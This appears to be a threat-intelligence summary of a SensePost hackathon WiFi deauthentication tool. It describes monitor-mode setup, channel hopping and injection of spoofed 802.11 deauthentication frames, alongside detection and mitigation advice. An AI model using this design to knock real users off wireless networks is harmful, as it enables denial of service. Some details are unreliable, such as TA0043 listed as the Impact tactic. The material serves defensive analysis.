Full Report
Wireless: it’s everywhere these days and yet owning it never gets boring. As part of our annual SensePost hackathon, where we get time off projects and get to spend a week tinkering with tech and ideas, the team I was in, consisting of Dominic, Nathi and myself, decided on creating a wireless rifle de-authentication gun, which utilized a yagi antenna and a Raspberry Pi. The idea was simple: simulate some of the tools available in aircrack-ng wireless hacking suite in one script but without utilizing aircrack-ng in the process.
Analysis Summary
# Tool/Technique: WiFi De-authentication Rifle (Custom Script)
## Overview
A custom Python script developed during a SensePost hackathon designed to simulate the functionality of tools found in the Aircrack-ng wireless hacking suite, specifically focusing on **de-authentication attacks**, without using Aircrack-ng itself. The tool leverages a Raspberry Pi, a Yagi antenna, and several Python libraries to achieve wireless monitoring and packet injection.
## Technical Details
- Type: Tool (Custom Script/Proof of Concept)
- Platform: Linux-based systems (implied, utilizing `iw` command and Python environment, likely targeting environments where Raspberry Pi runs, e.g., Raspbian/Kali).
- Capabilities: Monitor mode activation, channel hopping, traffic sniffing, 802.11 packet parsing (management/data frames), BSSID/SSID/Client MAC extraction, and custom generation/injection of 802.11 De-authentication packets.
- First Seen: July 13, 2015 (Publication Date)
## MITRE ATT&CK Mapping
This tool primarily focuses on **Reconnaissance** against wireless networks and **Impact** via denial of service.
- **TA0043 - Impact**
- T1499 - Denial of Service
- T1499.004 - Packet Flooding (or specific de-authentication flooding)
- **TA0043 - Reconnaissance**
- T1595 - Active Scanning
- T1595.003 - Wireless Scanning (Channel hopping for discovery)
## Functionality
### Core Capabilities
1. **Monitor Mode Setup:** Uses the `iw` command to place a specified wireless device into monitor mode (`mon0`) and brings the interface up.
* Command example: `iw dev %s interface add mon0 type monitor && ifconfig mon0 up`
2. **Channel Hopping:** Runs in a separate process, randomly selecting channels (1-13) and using `iw` to change the monitor interface's channel.
* Command example: `iw dev "mon0" set channel %d`
3. **Traffic Sniffing:** Utilizes **pcapy** to open a live capture session on the monitor interface (`mon0`) in promiscuous mode.
4. **Packet Parsing:** Employs **impacket**'s decoding capabilities (`_ImpactDecoder.RadioTapDecoder()`) along with custom logic to parse captured 802.11 frames (Data or Management).
5. **Information Extraction:** Specifically pulls BSSID, SSID, client MAC addresses (from `address2` in data packets), signal strength, and channel information from RadioTap headers.
6. **User Interface:** Uses **urwid** (ncurses wrapper) for displaying captured data (SSID/BSSID lists) and handling user input to select targets.
### Advanced Features
1. **Custom De-authentication Packet Generation:** Leverages **impacket** raw packet generation capabilities to construct a valid de-authentication sequence:
* Creates a **RadioTap** header (setting channel).
* Contains a **Dot11** frame (setting type/subtype to De-authentication).
* Contains a **Dot11ManagementFrame** (setting Source MAC/BSSID, Destination MAC/Client MAC, Sequence Number).
* Contains a **Dot11ManagementDeauthentication** frame.
2. **Packet Injection:** Sends the precisely constructed de-authentication packet via raw sockets (`socket.AF_PACKET, socket.SOCK_RAW`) bound to the monitor interface (`mon0`), impersonating the AP's BSSID as the source.
3. **Targeting Flexibility:** Capable of targeting a specific client MAC address or targeting all clients associated with an AP (by using the broadcast address as the destination).
## Indicators of Compromise
Since this is a custom, non-malicious Proof-of-Concept tool built for a hackathon, traditional IoCs like permanent file hashes are not standardly listed, but the setup components are:
- File Hashes: N/A (Tool source code, not persistent malware payload)
- File Names: Custom script filename (Not specified in the article, typically Python script)
- Registry Keys: N/A
- Network Indicators: N/A (Operates locally on Wi-Fi frames, does not utilize C2 by design)
- Behavioral Indicators:
* Insertion of a wireless interface into monitor mode (`mon0`).
* Frequent and rapid changes to 802.11 channels controlled by an external process.
* Injection of raw 802.11 Management De-authentication frames into the wireless medium towards specific client MACs or the broadcast address.
## Associated Threat Actors
- SensePost Hackathon Team (Dominic, Nathi, and the author 'saif').
- Not associated with known criminal or state-sponsored threat actors.
## Detection Methods
- Signature-based detection: Not applicable for a custom script unless a signature is generated against the known Python bytecode or specific file structure if deployed.
- Behavioral detection: Monitoring endpoint processes for legitimate utilities (`iw`) being executed programmatically by non-standard Python scripts, especially in quick succession with associated raw socket activity targeting wireless interfaces. Active defense systems monitoring RF traffic for excessive or unauthorized De-authentication frames.
- YARA rules: Not available.
## Mitigation Strategies
- **Prevention Measures:** Disable monitoring mode capability on endpoint wireless drivers if possible, though challenging on Linux/Raspberry Pi environments.
- **Hardening Recommendations:** Implement WPA3 where possible, as newer standards offer more robust protection against certain types of de-authentication attacks (e.g., MAC spoofing protection via opportunistic keys). Ensure physical security of devices hosting this tool. Use 802.11w (Protected Management Frames) if supported by the AP and clients to encrypt management frames, significantly mitigating the success of this specific attack vector.
## Related Tools/Techniques
- Aircrack-ng suite (specifically `aireplay-ng` for de-authentication).
- Scapy (mentioned as difficult to work with alongside threading, indicating it could have been an alternative packet crafting library used).
- MDK3/MDK4 (other tools capable of similar Wi-Fi denial of service attacks).